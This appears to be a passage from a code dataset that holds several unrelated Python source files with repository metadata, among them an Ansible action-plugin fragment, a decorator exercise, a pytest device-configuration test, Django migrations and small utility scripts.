display.debug("_low_level_execute_command() done: rc=%d, stdout=%s, stderr=%s" % (rc, stdout, stderr))
return dict(rc=rc, stdout=out, stdout_lines=out.splitlines(), stderr=err)
def _get_first_available_file(self, faf, of=None, searchdir='files'):
display.deprecated("first_available_file, use with_first_found or lookup('first_found',...) instead")
for fn in faf:
fnt = self._templar.template(fn)
if self._task._role is not None:
lead = self._task._role._role_path
else:
lead = fnt
fnd = self._loader.path_dwim_relative(lead, searchdir, fnt)
if not os.path.exists(fnd) and of is not None:
if self._task._role is not None:
lead = self._task._role._role_path
else:
lead = of
fnd = self._loader.path_dwim_relative(lead, searchdir, of)
if os.path.exists(fnd):
return fnd
return None
def _get_diff_data(self, destination, source, task_vars, source_file=True):
diff = {}
display.debug("Going to peek to see if file has changed permissions")
peek_result = self._execute_module(module_name='file', module_args=dict(path=destination, diff_peek=True), task_vars=task_vars, persist_files=True)
if not('failed' in peek_result and peek_result['failed']) or peek_result.get('rc', 0) == 0:
if peek_result['state'] == 'absent':
diff['before'] = ''
elif peek_result['appears_binary']:
diff['dst_binary'] = 1
elif peek_result['size'] > C.MAX_FILE_SIZE_FOR_DIFF:
diff['dst_larger'] = C.MAX_FILE_SIZE_FOR_DIFF
else:
display.debug("Slurping the file %s" % source)
dest_result = self._execute_module(module_name='slurp', module_args=dict(path=destination), task_vars=task_vars, persist_files=True)
if 'content' in dest_result:
dest_contents = dest_result['content']
if dest_result['encoding'] == 'base64':
dest_contents = base64.b64decode(dest_contents)
else:
raise AnsibleError("unknown encoding in content option, failed: %s" % dest_result)
diff['before_header'] = destination
diff['before'] = dest_contents
if source_file:
display.debug("Reading local copy of the file %s" % source)
try:
src = open(source)
src_contents = src.read(8192)
st = os.stat(source)
except Exception as e:
raise AnsibleError("Unexpected error while reading source (%s) for diff: %s " % (source, str(e)))
if "\x00" in src_contents:
diff['src_binary'] = 1
elif st[stat.ST_SIZE] > C.MAX_FILE_SIZE_FOR_DIFF:
diff['src_larger'] = C.MAX_FILE_SIZE_FOR_DIFF
else:
diff['after_header'] = source
diff['after'] = src_contents
else:
display.debug("source of file passed in")
diff['after_header'] = 'dynamically generated'
diff['after'] = source
return diff
| [
"[email protected]"
] | |
c8f4bb67eb5023fb6754b7accaaecaa3d3c89059 | b7312dc013ba06e5b44b33c0411f4948c4794346 | /study4/decorator3.py | 866d868685ac97384a6c6229bf76635ac05af61f | [] | no_license | GaoFuhong/python-code | 50fb298d0c1e7a2af55f1e13e48063ca3d1a189f | 7d17c98011e5a1e74d49332da9f87f5cb576822d | refs/heads/master | 2021-02-07T20:25:06.997173 | 2020-03-01T02:22:41 | 2020-03-01T02:26:04 | 244,072,971 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 947 | py | # Author:Fuhong Gao
#嵌套函数
# def foo():
# print("in the foo...")
# def bar():
# print("in the bar...")
# bar()
# foo()
#一个简单的装饰器(注意:在定义函数时,函数名应避免使用test1、rest2...否则容易出错)
import time
def timer(func): #将test1和test2传给func
#定义一个函数(“变量”)
def deco(*args,**kwargs):
start_time = time.time()
func(*args,**kwargs)
stop_time = time.time()
print("the func running time is %s" %(stop_time - start_time))
return deco #返回函数名
@timer #等价于:test1 = timer(test1),哪个函数要使用装饰器,就在它的头部加上@timer
def fun1(): #不含参数
time.sleep(1)
print("in the test1...")
@timer #test2 = timer(test2) test2(name,age) = deco(name,age)
def fun2(name,age): #含参数
time.sleep(1)
print("name:",name,"age:",age)
fun1()
fun2("gfh",22) | [
"[email protected]"
] | |
62b6f24a18c8dc7368fbaa3d566c57711600b466 | e2e08d7c97398a42e6554f913ee27340226994d9 | /pyautoTest-master(ICF-7.5.0)/test_case/scg/scg_LOG/test_c142794.py | 1fff26fd926e1ae41c0fb8a21027628e495f9ba9 | [] | no_license | lizhuoya1111/Automated_testing_practice | 88e7be512e831d279324ad710946232377fb4c01 | b3a532d33ddeb8d01fff315bcd59b451befdef23 | refs/heads/master | 2022-12-04T08:19:29.806445 | 2020-08-14T03:51:20 | 2020-08-14T03:51:20 | 287,426,498 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,709 | py | import pytest
import time
import sys
from os.path import dirname, abspath
sys.path.insert(0, dirname(dirname(abspath(__file__))))
from page_obj.scg.scg_def_physical_interface import *
from page_obj.scg.scg_def_vlan_interface import *
from page_obj.scg.scg_def_bridge import *
from page_obj.common.rail import *
from page_obj.scg.scg_def_log import *
from page_obj.common.ssh import *
from page_obj.scg.scg_def_dhcp import *
from page_obj.scg.scg_dev import *
from page_obj.scg.scg_def_ifname_OEM import *
from page_obj.scg.scg_def import *
test_id = 142794
def test_c142794(browser):
try:
login_web(browser, url=dev1)
add_email_alarm_jyl(browser, enable="yes", email_name="email_alert_jia_1", email_add="[email protected]",
cc_email="yes", cc_email_add="[email protected]", format="syslog", project="yes",
project_content="300", disk_full="yes", save="yes")
edit_email_alarm_jyl(browser, email_alert="email_alert_jia_1", format="welf", save="yes")
edit_email_alarm_jyl(browser, email_alert="email_alert_jia_1", format="csv", save="yes")
loginfo = get_log(browser, 管理日志)
# print(loginfo)
delete_email_alarm_server_jyl(browser, email_alarm="email_alert_jia_1")
try:
assert "配置 [EMAIL ALERT]对象成功" in loginfo
rail_pass(test_run_id, test_id)
except:
rail_fail(test_run_id, test_id)
assert "配置 [EMAIL ALERT]对象成功" in loginfo
except Exception as err:
# 如果上面的步骤有报错,重新设备,恢复配置
print(err)
reload(hostip=dev1)
rail_fail(test_run_id, test_id)
assert False
if __name__ == '__main__':
pytest.main(["-v", "-s", "test_c" + str(test_id) + ".py"])
| [
"[email protected]"
] | |
eed1238d3a0fd05c591f3ee36a20a12e4ab9be07 | 74bf86f99cc75006716edf5e25b040d1265ea134 | /forms.py | ae87ae5091d5c25ebab6d13b38b9d4a2d40c1c31 | [] | no_license | guoweikuang/flask_blog | 65ed13c9660e699d4ec3b01212c6dcd41bb7e5d9 | 1292918b81029fd5b149486d8a8478fc02b92618 | refs/heads/master | 2022-12-09T05:46:17.093246 | 2017-07-12T15:28:27 | 2017-07-12T15:28:27 | 94,674,289 | 0 | 0 | null | 2022-12-07T23:59:57 | 2017-06-18T08:15:43 | JavaScript | UTF-8 | Python | false | false | 623 | py | # -*- coding: utf-8 -*-
import re
from flask_wtf import FlaskForm
from wtforms import StringField, TextField
from wtforms import ValidationError
from wtforms.validators import DataRequired, Length
def custom_email(form_object, field_object):
"""自定义检验器,邮箱格式检验"""
if not re.match(r"[^@+@[^@]+\.[^@]]+", field_object):
raise ValidationError(u'邮箱地址格式不对!!!')
class CommentForm(FlaskForm):
"""评论表单"""
name = StringField(u'名字', validators=[DataRequired(), Length(max=255)])
text = TextField(u"内容", validators=[DataRequired()])
| [
"[email protected]"
] | |
44886b5540adf62e789a3e14c8bdb407164c6454 | fc6bc4cf23f713e3e4a97c00f724c977b3adbf82 | /venv/Scripts/rst2html4.py | cea8afb9d0e6e8c96822dd5798e93d5ce73aa0b3 | [] | no_license | Startrekker007/SInglePhotons | 8b429e29f78977adfa7711e8dae2cb864a13ea53 | 529c2ab3ea3c3797db4dd4e0a336ce35ea2e64a1 | refs/heads/master | 2022-12-12T16:38:56.412370 | 2020-02-04T00:19:57 | 2020-02-04T00:19:57 | 223,832,514 | 2 | 2 | null | 2022-12-08T09:25:43 | 2019-11-25T00:41:41 | VHDL | UTF-8 | Python | false | false | 738 | py | #!D:\SInglePhotons\venv\Scripts\python.exe
# $Id: rst2html4.py 7994 2016-12-10 17:41:45Z milde $
# Author: David Goodger <[email protected]>
# Copyright: This module has been placed in the public domain.
"""
A minimal front end to the Docutils Publisher, producing (X)HTML.
The output conforms to XHTML 1.0 transitional
and almost to HTML 4.01 transitional (except for closing empty tags).
"""
try:
import locale
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline, default_description
description = ('Generates (X)HTML documents from standalone reStructuredText '
'sources. ' + default_description)
publish_cmdline(writer_name='html4', description=description)
| [
"[email protected]"
] | |
74d32a699bdd95a5f76f5892163733b31d4f7216 | e203ddace08580170e3b4de9c79588209e857c1c | /dice.py | abdae853c875404a92648d58684acab4c6db318b | [] | no_license | stradtkt/OOPTreehouse-Python | e17f3fd48840049b8b741aa0e30e54d1409804b2 | 84e0ef2142118bf44c416a3b1dde3519ff57fd15 | refs/heads/main | 2023-02-26T15:03:27.053205 | 2021-02-04T13:04:26 | 2021-02-04T13:04:26 | 334,620,181 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 935 | py | import random
class Die:
def __init__(self, sides=2, value=0):
if not sides >= 2:
raise ValueError("Must have at least 2 sides")
if not isinstance(sides, int):
raise ValueError("Sides must be a whole number")
self.value = value or random.randint(1, sides)
def __int__(self):
return self.value
def __eq__(self, other):
return int(self) == other
def __ne__(self, other):
return int(self) != other
def __gt__(self, other):
return int(self) > other
def __lt__(self, other):
return int(self) < other
def __ge__(self, other):
return int(self) > other or int(self) == other
def __le__(self, other):
return int(self) < other or int(self) == other
def __repr__(self):
return str(self.value)
class D6(Die):
def __init__(self, value=0):
super().__init__(sides=6, value=value) | [
"[email protected]"
] | |
b99a5769e37c7e91afb7a10ecf5019595817fcd5 | 09120532659f7eb134163f92ac2f65423a04dc03 | /zproject/django/survey/teacher/migrations/0006_remove_question_page.py | b68e92589867082131f7e2af6969e05cc1c2cfca | [] | no_license | hoboland21/survey | 7b2dafd76db0e9317037a0cec163a97c0ec9a8ec | 93e71f3304b381a6be03c8f813d2ba3a0b6eb218 | refs/heads/master | 2023-01-28T07:38:38.934710 | 2019-05-13T08:55:41 | 2019-05-13T08:55:41 | 182,874,928 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 328 | py | # Generated by Django 2.2.1 on 2019-05-13 07:20
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('teacher', '0005_auto_20190502_0008'),
]
operations = [
migrations.RemoveField(
model_name='question',
name='page',
),
]
| [
"[email protected]"
] | |
73d0e57e7a4ce436b64584786aa7f686d7c5f0a8 | 3f2cc3d386ad184ca759a3fda072e35fa74baa09 | /artic/deprecated/lengths.py | 3d744e4898050bc511ac8f4f3de7b00f62f9de06 | [
"MIT"
] | permissive | artic-network/fieldbioinformatics | de91b5175b484f006ce15c0ef5607cb34f22954e | 314f52bcdd22faf827b7471086e97c196cc38c8f | refs/heads/master | 2023-09-01T17:50:54.222480 | 2023-08-22T12:20:05 | 2023-08-22T12:20:05 | 122,982,368 | 98 | 74 | MIT | 2023-09-08T16:37:07 | 2018-02-26T14:37:14 | Python | UTF-8 | Python | false | false | 124 | py | #!/usr/bin/env python
import sys
from Bio import SeqIO
for rec in SeqIO.parse(sys.stdin, "fasta"): print rec.id, len(rec)
| [
"[email protected]"
] | |
0a2d611f2578b26b114f89d0df16482b4e00844f | 37b2998b537673f0b2b0237887fe3ab1b4c525d1 | /workbench/offers/migrations/0002_offer_project.py | 0ced7448d48e952a677f636985a60ce7075c79c0 | [
"MIT"
] | permissive | ndarvishev/workbench | 1076fc86522884a3128fab25cd7f6f8162a152f4 | e93c35180990ee3424fbb7b73e26400cb869e29a | refs/heads/main | 2023-05-30T23:47:36.948646 | 2021-06-25T08:43:15 | 2021-06-25T08:43:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 619 | py | # Generated by Django 2.1.7 on 2019-03-04 21:39
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [("projects", "0001_initial"), ("offers", "0001_initial")]
operations = [
migrations.AddField(
model_name="offer",
name="project",
field=models.ForeignKey(
on_delete=django.db.models.deletion.PROTECT,
related_name="offers",
to="projects.Project",
verbose_name="project",
),
)
]
| [
"[email protected]"
] | |
dbadb79e1a21ae2572a427526517b255f2b2e995 | 2b25aae9266437b657e748f3d6fea4db9e9d7f15 | /graphics/3d/8/Andreas_Wang/parser.py | 6a3bff914ce674c14def05ef60a827e30890a319 | [] | no_license | Zilby/Stuy-Stuff | b1c3bc23abf40092a8a7a80e406e7c412bd22ae0 | 5c5e375304952f62667d3b34b36f0056c1a8e753 | refs/heads/master | 2020-05-18T03:03:48.210196 | 2018-11-15T04:50:03 | 2018-11-15T04:50:03 | 24,191,397 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,670 | py | from display import *
from matrix import *
from draw import *
from math import *
from types import *
# I had a neurotic need for everything to match the math notation of
# matrices being defined as rows x columns, so my matrix items I read
# as matrix[row][column]
# Since this would mean our point matrix is an n by 4 matrix,
# not a 4 by n matrix, in order to make this work, I flipped...
# everything. So every single transformation is... flipped.
# As is the order of the multiplication (I do points x transform).
# Fortunately this only means my transform matrix is flipped along
# a diagonal and should only be mildly instead of hair-wrenchingly confusing.
# Enjoy!
def parse_file( fname, points, transform ):
screen = new_screen()
color = [ 0, 255, 0 ]
f = open(fname, "r")
line = f.readline().strip()
while line:
if line == "l":
p = []
for x in f.readline().strip().split(' '):
p.append(int(x))
add_edge(points, p[0], p[1], p[2], p[3], p[4], p[5])
elif line == "i":
for x in range(4):
for y in range(4):
transform[x][y] = 0
transform[x][x] = 1
elif line == "s":
p = []
for x in f.readline().strip().split():
p.append(float(x))
for n in range(3):
transform[n][n] *= p[n]
elif line == "t":
p = []
for x in f.readline().strip().split():
p.append(int(x))
for n in range(3):
transform[3][n] += p[n]
elif line == "c":
p = []
for x in f.readline().strip().split():
p.append(float(x))
make_circle(points, p[0], p[1], p[2])
elif line == "h":
p = []
for x in f.readline().strip().split():
p.append(float(x))
make_spline(points, "hermite",p)
elif line == "b":
p = []
for x in f.readline().strip().split():
p.append(float(x))
make_spline(points, "bezier",p)
elif line == "w":
points = new_matrix()
elif line == "p":
p = []
for x in f.readline().strip().split():
p.append(int(x))
make_prism(points, p[0], p[1], p[2], p[3], p[4], p[5])
elif line =="m":
p = []
for x in f.readline().strip().split():
p.append(int(x))
make_sphere(points, p[0], p[1], p[2])
elif line =="d":
p = []
for x in f.readline().strip().split():
p.append(int(x))
make_torus(points, p[0], p[1], p[2], p[3])
elif line == "x":
transform = rotate("x", f.readline().strip(), points, transform)
elif line == "y":
transform = rotate("y", f.readline().strip(), points, transform)
elif line == "z":
transform = rotate("z", f.readline().strip(), points, transform)
elif line == "a":
#print "transform: "
#print_matrix(transform)
points = mult(points, transform, True)
elif line == "v":
clear_screen(screen)
draw_lines( points, screen, color )
display(screen)
elif line == "g":
save_ppm(screen, f.readline().strip().strip())
display(screen)
line = f.readline().strip()
#print_matrix( points)
f.close()
def rotate(axis, theta, points, transform):
theta = float(theta) * pi / 180
#print cos(theta)
if axis == "x":
t = new_matrix()
t[0][0] = 1
t[1][1] = cos(theta)
t[1][2] = sin(theta)
t[2][1] = -1.0 * sin(theta)
t[2][2] = cos(theta)
elif axis == "y":
t = new_matrix()
t[1][1] = 1
t[0][0] = cos(theta)
t[0][2] = -1.0 * sin(theta)
t[2][0] = sin(theta)
t[2][2] = cos(theta)
elif axis == "z":
t = new_matrix()
t[2][2] = 1
t[0][0] = cos(theta)
t[0][1] = sin(theta)
t[1][0] = -1.0 * sin(theta)
t[1][1] = cos(theta)
t[3][3] = 1
#print_matrix(t)
#print_matrix(transform)
transform = mult(t, transform, False)
#print_matrix(transform)
return transform
def make_prism(points, x, y, z, w, h, d):
add_edge(points, x, y, z, x, y, z)
add_edge(points, x, y, z - d, x, y, z - d)
add_edge(points, x, y - h, z, x, y - h, z)
add_edge(points, x, y - h, z - d, x, y - h, z - d)
add_edge(points, x + w, y, z, x + w, y, z)
add_edge(points, x + w, y, z - d, x + w, y, z - d)
add_edge(points, x + w, y - h, z, x + w, y - h, z)
add_edge(points, x + w, y - h, z - d, x + w, y - h, z - d)
def make_sphere(points, x0, y0, r):
z0 = 0
for a in range(100):
for b in range(100):
theta = a / 100.0 * pi * 2.0
phi = b / 100.0 * pi
x = x0 + int(r * cos(theta) * sin(phi))
y = y0 + int(r * sin(theta) * sin(phi))
z = z0 + int(r * cos(phi))
add_edge(points, x, y, z, x, y,z)
def make_torus(points, x0, y0, r, R):
z0 = 0
for a in range(100):
for b in range(100):
theta = a / 100.0 * pi * 2.0
phi = b / 100.0 * pi * 2.0
x = x0 + int(cos(phi) * (r * cos(theta) + R))
y = y0 + int(r * sin(theta))
z = z0 + int(-1.0 * sin(phi) * (r * cos(theta) + R))
add_edge(points, x, y, z, x, y,z)
points = []
transform = new_matrix(4,4)
parse_file( 'script_c', points, transform )
| [
"[email protected]"
] | |
8741b9aed2a4193f98da42908af3309846ac847d | 23805cffc86ac4dfb5bcce672b8c7070b4616e41 | /Apprendre-Python/is-prime/scripts/generate.py | 6c3f901f4ee05d4b2bf8c0c39ea1473a1f97b3d0 | [] | no_license | ukonline/pythia-tasks | f90ff90299fe0eedd0e2787bcf666df07c709a00 | 81a3731eb0cdfe16b26a4e75a165a5071fb48ff5 | refs/heads/master | 2021-01-25T03:26:33.915795 | 2016-01-04T20:03:24 | 2016-01-04T20:03:24 | 40,974,655 | 0 | 2 | null | 2016-12-21T13:12:14 | 2015-08-18T13:49:39 | Python | UTF-8 | Python | false | false | 467 | py | #!/usr/bin/python3
# -*- coding: utf-8 -*-
# Course: Apprendre Python
# Problem: Es-tu premier ?
# Test generation script
import csv
import json
import os
import sys
sys.path.append('/task/static')
from lib import pythia
# Read test configuration and generate test data
with open('/task/config/test.json', 'r', encoding='utf-8') as file:
content = file.read()
config = json.loads(content)
pythia.generateTestData('/tmp/work/input', 'data.csv', config)
| [
"[email protected]"
] | |
ffbc110b9951442796efd9600d9055a83d244b5b | 818c7b09d7e264c130a849f86dabaa3d43656870 | /pycharm学习-基础篇/python基础知识/test.py | 763515ace02b3a729f53fe1e69b0baed1afca1d0 | [] | no_license | rishinkaku/python_course | b89d51b38f64248e074ba66230353b1b335475ab | 6a2f2c175c863776a0e1125a8359a8ea97b95456 | refs/heads/master | 2020-03-28T11:50:20.231058 | 2018-08-29T13:01:59 | 2018-08-29T13:01:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 114 | py | a=[1,2,3]
def run(n):
for i in n:
print(i)
if i<3:
return 'yes'
r=run(a)
print(r) | [
"[email protected]"
] | |
c3ad0423c6d8b271ee252911c594199f7ab74981 | 98a9e00e0e3148e296cecf8bb5e5493d5e7c9cda | /pavement.py | d2b4556aeac8553cddab8d302a000b78bed97169 | [] | no_license | cfobel/barcode-scanner | 62b81f4d1bd36a61fea369703f9dee833916a982 | a59acd8fef93769992b3d7a50365fbbef2d475e6 | refs/heads/master | 2016-09-14T01:42:03.545862 | 2016-04-20T18:46:02 | 2016-04-20T18:46:02 | 56,710,781 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,877 | py | import platform
import sys
from paver.easy import task, needs, path, sh, cmdopts, options
from paver.setuputils import setup, install_distutils_tasks
from distutils.extension import Extension
from distutils.dep_util import newer
sys.path.insert(0, path('.').abspath())
import version
install_requires = ['matplotlib>=1.5.0', 'numpy', 'pygst-utils>=0.3.post4',
'zbar']
# Platform-specific package requirements.
if platform.system() == 'Windows':
install_requires += ['opencv-python', 'pygtk2-win', 'pycairo-gtk2-win',
'pygst-0.10-win']
else:
try:
import gtk
except ImportError:
print >> sys.err, ('Please install Python bindings for Gtk 2 using '
'your systems package manager.')
try:
import cv2
except ImportError:
print >> sys.err, ('Please install OpenCV Python bindings using your '
'systems package manager.')
try:
import gst
except ImportError:
print >> sys.err, ('Please install GStreamer Python bindings using '
'your systems package manager.')
setup(name='barcode-scanner',
version=version.getVersion(),
description='Barcode scanner based on GStreamer, zbar, and gtk.',
keywords='gtk, zbar, gstreamer',
author='Christian Fobel and Michael D. M. Dryden',
author_email='[email protected] and [email protected]',
url='https://github.com/wheeler-microfluidics/barcode-scanner',
license='GPL',
packages=['barcode_scanner', ],
install_requires=install_requires,
# Install data listed in `MANIFEST.in`
include_package_data=True)
@task
@needs('generate_setup', 'minilib', 'setuptools.command.sdist')
def sdist():
"""Overrides sdist to make sure that our setup.py is generated."""
pass
| [
"[email protected]"
] | |
9fab66e95f7f0019a0d653ed7dd76704f7ec115a | 3473c619629ed2b6c69c9d89bc0b3229b6930137 | /Day 06 - Functions and Modules/Prime.py | 3577b2eec902655e2f93a4d6832b4d5b1d1c9034 | [] | no_license | Bobby981229/Python-Learning | 621b185e212bf7102f75c9b8ff5992ceffa0c78b | e37c37fab504597ddca569213394cec4f88ad1f4 | refs/heads/master | 2022-10-14T07:56:59.117446 | 2020-06-09T13:42:12 | 2020-06-09T13:42:12 | 259,191,244 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 407 | py | """
素数
"""
from math import sqrt # 开根号
def prime(num):
result = int(sqrt(num)) # 对输入的数字进行开根号计算
for x in range(2, result + 1):
if num % x == 0: # 判断数字的模
return False
return True if num != 1 else False
num = int(input('Please input a integer number: '))
# 0 is false, 1 is true
print('%d result: %d' % (num, prime(num)))
| [
"[email protected]"
] | |
26cda9d143eff38c26755fdc0f64aac127dfe784 | cd0a284c47fb03121e05284b6d5f2940ea6457ba | /fb/misc/subset-backtracking.py | 5e9517de45750964ef37a1896e73ff591ccb175c | [] | no_license | franktank/py-practice | 5803933c07c07a06670f83b059806385d0d029fa | 1dec441f1975d402d093031569cfd301eb71d465 | refs/heads/master | 2021-03-22T04:33:20.818891 | 2017-11-14T03:40:54 | 2017-11-14T03:40:54 | 101,592,046 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 480 | py | class Solution(object):
def subsets(self, nums):
"""
:type nums: List[int]
:rtype: List[List[int]]
"""
self.res = []
self.helper(nums, [], 0)
return self.res
def helper(self, nums, cur_set, start):
self.res.append(list(cur_set))
for i in range(start, len(nums)):
cur_set.append(nums[i])
self.helper(nums, cur_set, i + 1) # i+1 because no duplicates
cur_set.pop()
| [
"[email protected]"
] | |
bb6aea31ed8fa714e9f3e4f9efea69c2821b47ef | dfcb9827b966a5055a47e27b884eaacd88269eb1 | /ssseg/cfgs/ce2p/cfgs_atr_resnet101os8.py | 92f1a161fe76d80856d312d01c4f8809fa71a746 | [
"MIT"
] | permissive | RiDang/sssegmentation | cdff2be603fc709c1d03897383032e69f850f0cd | 2a79959a3d7dff346bab9d8e917889aa5621615a | refs/heads/main | 2023-02-05T12:52:35.391061 | 2020-12-27T05:59:58 | 2020-12-27T05:59:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,326 | py | '''define the config file for atr and resnet101os8'''
from .base_cfg import *
# modify dataset config
DATASET_CFG = DATASET_CFG.copy()
DATASET_CFG['train'].update(
{
'type': 'atr',
'rootdir': 'data/ATR',
'aug_opts': [('Resize', {'output_size': (520, 520), 'keep_ratio': False, 'scale_range': (0.75, 1.25)}),
('RandomCrop', {'crop_size': (473, 473), 'one_category_max_ratio': 0.75}),
('RandomFlip', {'flip_prob': 0.5, 'fix_ann_pairs': [(9, 10), (12, 13), (14, 15)]}),
('RandomRotation', {'angle_upper': 30, 'rotation_prob': 0.6}),
('PhotoMetricDistortion', {}),
('Normalize', {'mean': [123.675, 116.28, 103.53], 'std': [58.395, 57.12, 57.375]}),
('ToTensor', {}),
('Padding', {'output_size': (473, 473), 'data_type': 'tensor'}),]
}
)
DATASET_CFG['test'].update(
{
'type': 'atr',
'rootdir': 'data/ATR',
'aug_opts': [('Resize', {'output_size': (473, 473), 'keep_ratio': False, 'scale_range': None}),
('Normalize', {'mean': [123.675, 116.28, 103.53], 'std': [58.395, 57.12, 57.375]}),
('ToTensor', {}),]
}
)
# modify dataloader config
DATALOADER_CFG = DATALOADER_CFG.copy()
DATALOADER_CFG['train'].update(
{
'batch_size': 32,
}
)
# modify optimizer config
OPTIMIZER_CFG = OPTIMIZER_CFG.copy()
OPTIMIZER_CFG.update(
{
'max_epochs': 150
}
)
# modify losses config
LOSSES_CFG = LOSSES_CFG.copy()
# modify model config
MODEL_CFG = MODEL_CFG.copy()
MODEL_CFG.update(
{
'num_classes': 18,
'backbone': {
'type': 'resnet101',
'series': 'resnet',
'pretrained': True,
'outstride': 8,
'use_stem': True
}
}
)
# modify common config
COMMON_CFG = COMMON_CFG.copy()
COMMON_CFG['train'].update(
{
'backupdir': 'ce2p_resnet101os8_atr_train',
'logfilepath': 'ce2p_resnet101os8_atr_train/train.log',
}
)
COMMON_CFG['test'].update(
{
'backupdir': 'ce2p_resnet101os8_atr_test',
'logfilepath': 'ce2p_resnet101os8_atr_test/test.log',
'resultsavepath': 'ce2p_resnet101os8_atr_test/ce2p_resnet101os8_atr_results.pkl'
}
) | [
"[email protected]"
] | |
8d99a90f253646661425e340c0b8b5d9743a0554 | 8a3e59ac20b2667c7f43ab91a7fd09f5a52fec4e | /apps/crm/callcentre/migrations/0001_initial.py | 16d3a8789f6799bed13602c35d3f16407455ac78 | [] | no_license | suifengdou/tbd2 | b1ba8ed423ace8624366ddbdd788f0ab7025d062 | 39093cdd45bb652e9cdfa3dc31e07344cf6628a1 | refs/heads/master | 2021-06-22T20:19:15.743182 | 2021-01-08T03:59:47 | 2021-01-08T03:59:47 | 159,639,770 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,422 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.29 on 2020-11-27 10:04
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='OriCallLogInfo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name='创建时间')),
('update_time', models.DateTimeField(auto_now=True, verbose_name='更新时间')),
('is_delete', models.BooleanField(default=False, verbose_name='删除标记')),
('creator', models.CharField(default='system', max_length=30, verbose_name='创建者')),
('call_time', models.DateTimeField(verbose_name='时间')),
('mobile', models.CharField(max_length=30, verbose_name='客户电话')),
('location', models.CharField(blank=True, max_length=30, null=True, verbose_name='归属地')),
('relay_number', models.CharField(max_length=30, verbose_name='中继号')),
('customer_service', models.CharField(blank=True, max_length=30, null=True, verbose_name='客服')),
('call_category', models.CharField(max_length=30, verbose_name='通话类型')),
('source', models.CharField(max_length=30, verbose_name='来源')),
('line_up_status', models.CharField(blank=True, max_length=30, null=True, verbose_name='排队状态')),
('line_up_time', models.TimeField(verbose_name='排队耗时')),
('device_status', models.CharField(blank=True, max_length=30, null=True, verbose_name='设备状态')),
('result', models.CharField(max_length=30, verbose_name='通话结果')),
('failure_reason', models.CharField(blank=True, max_length=30, null=True, verbose_name='外呼失败原因')),
('call_recording', models.TextField(blank=True, null=True, verbose_name='通话录音')),
('call_length', models.TimeField(verbose_name='通话时长')),
('message', models.TextField(verbose_name='留言')),
('ring_time', models.TimeField(verbose_name='响铃时间')),
('ring_off', models.CharField(blank=True, max_length=30, null=True, verbose_name='通话挂断方')),
('degree_satisfaction', models.CharField(max_length=30, verbose_name='满意度评价')),
('theme', models.CharField(blank=True, max_length=230, null=True, verbose_name='主题')),
('sequence_ring', models.CharField(max_length=30, verbose_name='顺振')),
('relevant_cs', models.CharField(blank=True, max_length=30, null=True, verbose_name='相关客服')),
('work_order', models.CharField(blank=True, max_length=30, null=True, verbose_name='生成工单')),
('email', models.CharField(blank=True, max_length=60, null=True, verbose_name='邮箱')),
('tag', models.CharField(blank=True, max_length=30, null=True, verbose_name='标签')),
('description', models.TextField(blank=True, null=True, verbose_name='描述')),
('leading_cadre', models.CharField(blank=True, max_length=30, null=True, verbose_name='负责人')),
('group', models.CharField(blank=True, max_length=30, null=True, verbose_name='负责组')),
('degree', models.CharField(max_length=30, verbose_name='等级')),
('is_blacklist', models.CharField(max_length=30, verbose_name='是否在黑名单')),
('call_id', models.CharField(max_length=230, verbose_name='call_id')),
('reason', models.CharField(blank=True, max_length=60, null=True, verbose_name='补寄原因')),
('call_class', models.CharField(blank=True, max_length=60, null=True, verbose_name='来电类别')),
('goods_name', models.CharField(blank=True, max_length=60, null=True, verbose_name='商品型号')),
('process_category', models.CharField(blank=True, max_length=60, null=True, verbose_name='处理方式')),
('goods_id', models.CharField(blank=True, max_length=60, null=True, verbose_name='产品编号')),
('purchase_time', models.CharField(blank=True, max_length=60, null=True, verbose_name='购买日期')),
('service_info', models.CharField(blank=True, max_length=230, null=True, verbose_name='补寄配件记录')),
('shop', models.CharField(blank=True, max_length=60, null=True, verbose_name='店铺')),
('order_status', models.IntegerField(choices=[(0, '已取消'), (1, '未处理'), (2, '未抽检'), (3, '已完成')], default=1, verbose_name='单据状态')),
('process_tag', models.IntegerField(choices=[(0, '未处理'), (1, '待核实'), (2, '已确认'), (3, '待清账'), (4, '已处理'), (5, '特殊订单')], default=0, verbose_name='处理标签')),
('mistake_tag', models.SmallIntegerField(choices=[(0, '正常'), (1, '重复建单'), (2, '无补寄原因'), (3, '无店铺'), (4, '补寄配件记录格式错误'), (5, '补寄原因错误'), (6, '单据创建失败')], default=0, verbose_name='错误列表')),
('is_sampling', models.SmallIntegerField(choices=[(0, '否'), (1, '是')], default=0, verbose_name='是否抽检')),
('content_category', models.SmallIntegerField(choices=[(0, '常规'), (1, '订单')], default=0, verbose_name='内容类型')),
],
options={
'verbose_name': 'CRM-原始通话记录-查询',
'verbose_name_plural': 'CRM-原始通话记录-查询',
'db_table': 'crm_cal_oricalllog',
},
),
migrations.CreateModel(
name='CheckOriCall',
fields=[
],
options={
'verbose_name': 'CRM-原始通话记录-未处理',
'verbose_name_plural': 'CRM-原始通话记录-未处理',
'proxy': True,
'indexes': [],
},
bases=('callcentre.oricallloginfo',),
),
]
| [
"[email protected]"
] | |
